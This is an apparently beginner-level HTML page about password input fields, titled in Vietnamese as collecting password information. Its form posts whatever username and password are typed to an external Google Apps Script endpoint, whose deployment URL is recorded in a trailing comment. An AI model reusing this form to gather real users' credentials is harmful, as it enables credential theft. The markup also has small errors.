<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> Thu thập thông tin mật khẩu  </title>

    <style>

        .container{
            width: 20%;
            margin: 0 auto;
            padding: 20px;
            background-color: #f0f0f0;
            border-radius: 10px;
            display: flex;
            flex-direction: column;

        }

        form{
            width: 20%;
            display: flex;
            flex-direction: column;
 
            
            
        }

        input[type="submit"]{
            width: 30%;
            margin-top: 10px;
            padding: 5px;
            border-radius: 5px;
            border: 1px solid #ccc;
            background-color: #4CAF50;
            color: white;
            cursor: pointer;
        },


    </style>
</head>
<body>

    <div container> 

        <h2> Password field </h2>
        <p> The input type = "Password" defines a password filed </p>

        <form action="https://script.google.com/macros/s/AKfycbyHJLOEw2D-qLCBophdYPGXk7oqGDTyIbYn07LiezNmJchFjpSct6_uLyhOTeyxzMJ8Hw/exec"
        method="post">
            <label for="ten"> Username  :  </label>
            <input type="text"  name="ten">  <br> 

            <label for="matkhau"> Password : </label>
            <input type="password"  name="matkhau"> <br>

            <input type="submit"  value="Gửi đi" name="" id="">
        </form>

    <p>  The characters in a password field are  masked (shown as asterisks or circles ). </p>
    
    </div>
</body>
</html>


<!-- 
AKfycbyHJLOEw2D-qLCBophdYPGXk7oqGDTyIbYn07LiezNmJchFjpSct6_uLyhOTeyxzMJ8Hw

https://script.google.com/macros/s/AKfycbyHJLOEw2D-qLCBophdYPGXk7oqGDTyIbYn07LiezNmJchFjpSct6_uLyhOTeyxzMJ8Hw/exec


Deployment successfully updated.
Version 1 on May 28, 2025, 4:44 AM
Deployment ID
AKfycbyHJLOEw2D-qLCBophdYPGXk7oqGDTyIbYn07LiezNmJchFjpSct6_uLyhOTeyxzMJ8Hw
Web app
URL
https://script.google.com/macros/s/AKfycbyHJLOEw2D-qLCBophdYPGXk7oqGDTyIbYn07LiezNmJchFjpSct6_uLyhOTeyxzMJ8Hw/exec

 -->